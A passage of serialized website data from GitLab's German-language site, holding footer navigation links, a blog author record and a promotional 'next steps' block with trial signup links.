services",{"title":204,"links":567},[568,570,572,574,577,579,582,584,586,588,590,592,594],{"text":216,"config":569},{"href":218,"dataGaName":219,"dataGaLocation":471},{"text":221,"config":571},{"href":223,"dataGaName":224,"dataGaLocation":471},{"text":226,"config":573},{"href":228,"dataGaName":229,"dataGaLocation":471},{"text":231,"config":575},{"href":233,"dataGaName":576,"dataGaLocation":471},"docs",{"text":254,"config":578},{"href":256,"dataGaName":5,"dataGaLocation":471},{"text":249,"config":580},{"href":581,"dataGaName":252,"dataGaLocation":471},"/customers/",{"text":258,"config":583},{"href":260,"dataGaName":261,"dataGaLocation":471},{"text":271,"config":585},{"href":273,"dataGaName":274,"dataGaLocation":471},{"text":263,"config":587},{"href":265,"dataGaName":266,"dataGaLocation":471},{"text":276,"config":589},{"href":278,"dataGaName":279,"dataGaLocation":471},{"text":281,"config":591},{"href":283,"dataGaName":284,"dataGaLocation":471},{"text":286,"config":593},{"href":288,"dataGaName":289,"dataGaLocation":471},{"text":291,"config":595},{"href":293,"dataGaName":294,"dataGaLocation":471},{"title":309,"links":597},[598,600,602,604,606,608,610,614,619,621,623,625],{"text":316,"config":599},{"href":318,"dataGaName":311,"dataGaLocation":471},{"text":321,"config":601},{"href":323,"dataGaName":324,"dataGaLocation":471},{"text":329,"config":603},{"href":331,"dataGaName":332,"dataGaLocation":471},{"text":334,"config":605},{"href":336,"dataGaName":337,"dataGaLocation":471},{"text":339,"config":607},{"href":341,"dataGaName":342,"dataGaLocation":471},{"text":344,"config":609},{"href":346,"dataGaName":347,"dataGaLocation":471},{"text":611,"config":612},"Sustainability",{"href":613,"dataGaName":611,"dataGaLocation":471},"/sustainability/",{"text":615,"config":616},"Vielfalt, Inklusion und Zugehörigkeit",{"href":617,"dataGaName":618,"dataGaLocation":471},"/diversity-inclusion-belonging/","Diversity, inclusion and belonging",{"text":349,"config":620},{"href":351,"dataGaName":352,"dataGaLocation":471},{"text":359,"config":622},{"href":361,"dataGaName":362,"dataGaLocation":471},{"text":364,"config":624},{"href":366,"dataGaName":367,"dataGaLocation":471},{"text":626,"config":627},"Transparenzerklärung zu moderner Sklaverei",{"href":628,"dataGaName":629,"dataGaLocation":471},"https://handbook.gitlab.com/handbook/legal/modern-slavery-act-transparency-statement/","modern slavery transparency statement",{"title":631,"links":632},"Nimm Kontakt auf",[633,636,638,640,645,650,655],{"text":634,"config":635},"Sprich mit einem Experten/einer Expertin",{"href":48,"dataGaName":49,"dataGaLocation":471},{"text":378,"config":637},{"href":380,"dataGaName":381,"dataGaLocation":471},{"text":383,"config":639},{"href":385,"dataGaName":386,"dataGaLocation":471},{"text":641,"config":642},"Status",{"href":643,"dataGaName":644,"dataGaLocation":471},"https://status.gitlab.com/","status",{"text":646,"config":647},"Nutzungsbedingungen",{"href":648,"dataGaName":649,"dataGaLocation":471},"/terms/","terms of use",{"text":651,"config":652},"Datenschutzerklärung",{"href":653,"dataGaName":654,"dataGaLocation":471},"/de-de/privacy/","privacy statement",{"text":656,"config":657},"Cookie-Einstellungen",{"dataGaName":658,"dataGaLocation":471,"id":659,"isOneTrustButton":21},"cookie preferences","ot-sdk-btn",{"items":661},[662,664,666],{"text":646,"config":663},{"href":648,"dataGaName":649,"dataGaLocation":471},{"text":651,"config":665},{"href":653,"dataGaName":654,"dataGaLocation":471},{"text":656,"config":667},{"dataGaName":658,"dataGaLocation":471,"id":659,"isOneTrustButton":21},"content:shared:de-de:main-footer.yml","Main Footer","shared/de-de/main-footer.yml","shared/de-de/main-footer",[673],{"_path":674,"_dir":675,"_draft":6,"_partial":6,"_locale":7,"content":676,"config":680,"_id":682,"_type":25,"title":13,"_source":27,"_file":683,"_stem":684,"_extension":30},"/en-us/blog/authors/michael-henriksen","authors",{"name":13,"config":677},{"headshot":678,"ctfId":679},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659488/Blog/Author%20Headshots/gitlab-logo-extra-whitespace.png","3DmojnawcJFqAgoNMCpFTX",{"template":681},"BlogAuthor","content:en-us:blog:authors:michael-henriksen.yml","en-us/blog/authors/michael-henriksen.yml","en-us/blog/authors/michael-henriksen",{"_path":686,"_dir":33,"_draft":6,"_partial":6,"_locale":7,"header":687,"eyebrow":688,"blurb":689,"button":690,"secondaryButton":694,"_id":696,"_type":25,"title":697,"_source":27,"_file":698,"_stem":699,"_extension":30},"/shared/de-de/next-steps","Stelle jetzt bessere Software schneller bereit","Mehr als 50 % der Fortune-100-Unternehmen vertrauen GitLab","Erlebe, was dein Team mit der intelligenten\n\n\nDevSecOps-Plattform erreichen kann.\n",{"text":41,"config":691},{"href":692,"dataGaName":44,"dataGaLocation":693},"https://gitlab.com/-/trial_registrations/new?glm_content=default-saas-trial&glm_source=about.gitlab.com/","feature",{"text":46,"config":695},{"href":48,"dataGaName":49,"dataGaLocation":693},"content:shared:de-de:next-steps.yml","Next Steps","shared/de-de/next-steps.yml","shared/de-de/next-steps",1753981622383]